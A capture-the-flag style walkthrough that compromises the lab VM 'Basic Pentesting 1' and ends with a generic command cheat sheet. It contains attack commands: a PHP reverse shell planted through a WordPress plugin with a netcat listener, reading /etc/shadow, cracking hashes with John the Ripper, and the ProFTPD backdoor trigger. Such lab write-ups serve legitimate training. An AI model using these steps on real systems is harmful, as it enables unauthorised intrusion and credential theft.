Setup
Our attacking box is a virtual machine that has the IP 192.168.56.102 and runs an updated Kali Linux 2020.3. Throughout the penetration test, we will try to avoid using any automated exploitation tools. The target is Basic Pentesting 1, a vulnerable virtual machine to practice penetration testing. It has the IP 192.168.56.104 and we have no further information about this target.
Information Gathering
Since we are already on the same subnet as the target and we know the IP, the first step is to scan for open ports with nmap. We decide to do a quick TCP scan and have nmap guess the software and versions running on each port (-sV). We also avoid pinging the host (-Pn) and don’t need DNS resolving (-n).
sudo nmap -sV -Pn -n 192.168.56.104
Note that this scan took only about 7 seconds. If we were to add UDP scanning as well (-sU) it would take a bit over 18 minutes. We have the following open ports to investigate:
- FTP server (ProFTPD 1.3.3c on port 21)
- SSH server (OpenSSH 7.2p2 Ubuntu)
- webserver (Apache httpd 2.4.18 Ubuntu)
Let’s start with the webserver.
Exploitation
Webserver
The first thing we do is connect to the server with a browser. We are greeted with a default “It works!” page. For good measure we also use “View Source” but that just reveals some plain HTML.
Next, get a quick overview by running nikto on the webserver.
nikto -h 192.168.56.104
Apart from the fact that the Apache version is outdated (worth checking for exploits) and some other potential vulnerabilities, nikto was able to detect a directory /secret/ which seems worth investigating by accessing it directly in the browser.
Seems like we found a WordPress blog. However, the layout looks broken, and hovering over the “Hello World” link reveals it is pointing to http://vtcsec/secret/index.php/2017/11/16/hello-world/. To fix this, we add a line for vtcsec in the /etc/hosts file of our attacking box.
sudo nano /etc/hosts
... in the file ...
127.0.0.1 localhost
127.0.1.1 kali
192.168.56.104 vtcsec
That fixes things. We can check for the WordPress admin interface by going to 192.168.56.104/secret/wp-admin/. Surprisingly, the default username/password combination admin/admin works and we can access the admin dashboard.
Since we can load PHP-Code in WordPress by pasting it into a plugin or by editing the theme (Appearance -> Editor) and refreshing the page, we can install a PHP reverse shell. Kali-Linux comes with a selection of premade shells to pick from.
cat /usr/share/webshells/php/php-reverse-shell.php
To use the reverse shell, we use nc to listen (-l) for incoming connections on a specified port (-p 1122) on our attacking box.
nc -vnlp 1122
We activate the “Hello Dolly” plugin and copy-paste the reverse shell to replace the code of the plugin (Plugins -> Editor) and change $ip and $port to the IP of our attacking box and the target port (1122).
After clicking the “Update File” button, we successfully gain a shell as the user www-data (note that it might appear as if nothing happened but we get the shell as soon as we click the button).
Post Exploitation
The next step is to escalate our rights from the user www-data to the superuser root. Let’s see what user accounts with a login shell exist on the target machine. We exclude ‘false’ and ‘nologin’ with grep -v.
cat /etc/passwd | grep -v 'false\|nologin'
Apart from the root user, there’s one other user of interest who goes by the handle marlinspike. However, when we try to change to another user…
sudo su
…we only see the error message “sudo: no tty present and no askpass program specified”. So the first thing we need to do is get a tty. There are a couple of different ways to do that [1,2]. We opt for the script method, because it is pretty simple and straightforward.
script -qc /bin/bash /dev/null
Unfortunately, we cannot log in as either root or marlinspike, because we have to provide the password of www-data. Let’s see if we can read /etc/shadow.
cat /etc/shadow | grep 'root\|marlinspike'
Surprisingly, we are allowed to read the file and so we can grab the hash of the user marlinspike and try to crack it with “John The Ripper”. First, we use nano to create a file called ms.pass where we copy/paste the username:hash part of /etc/shadow and after that we run john on that file from our attacking box.
sudo john -single ms.pass
As we can see, the password is also marlinspike. We try to ssh into the machine as marlinspike with the freshly cracked password and it works.
ssh marlinspike@192.168.56.104
After checking our sudo rights with sudo -l we can see that we are allowed to become root. Mission accomplished 🙂
Alternative Attacks
FTP server
Let’s check out the FTP server to see if there’s another way to get root privileges on the target. A quick Google search for “proftpd 1.3.3c exploit” reveals that this particular version of ProFTPD might contain a backdoor [3]. We can try if that is the case by connecting to the server and issuing “HELP ACIDBITCHEZ”. It works and this time we’ll use another way to get a tty (by using Python). Seems like the FTP server is a very quick way to gain root access.
Lessons Learned
Information gathering
Portscanning
A quick overview of the most common 1000 TCP ports:
sudo nmap -sV -Pn -n TARGET-IP
Webserver
Always check out the website in a browser first and view the source code. Scan a webserver for common vulnerabilities and find directories:
nikto -h TARGET-IP
Edit /etc/hosts on the attacking box to fix broken websites.
Exploitation
Misc
Try default usernames like admin/admin for WordPress (site/wp-admin).
Reverse shell
Use netcat to catch a reverse shell:
nc -vnlp PORT
Copy /paste web reverse shells from Kali’s /usr/share/webshells directory into suitable locations like WordPress plugins and reload the page.
Post Exploitation
tty
script -qc /bin/bash /dev/null
python -c "import pty; pty.spawn('/bin/bash')"
Passwords
Check for users that are allowed to login:
cat /etc/passwd | grep -v 'false\|nologin'
Get the password hash of a user (not allowed by default, as /etc/shadow is not world readable):
cat /etc/shadow | grep 'USERNAME'
Crack a password hash:
echo "USERNAME:HASH" > pw.pass
sudo john -single pw.pass
Sources
[1] https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#tldr-cheatsheet
[3] https://www.securitygeneration.com/security/proftpd-1-3-3c-briefly-backdoored-by-hackers/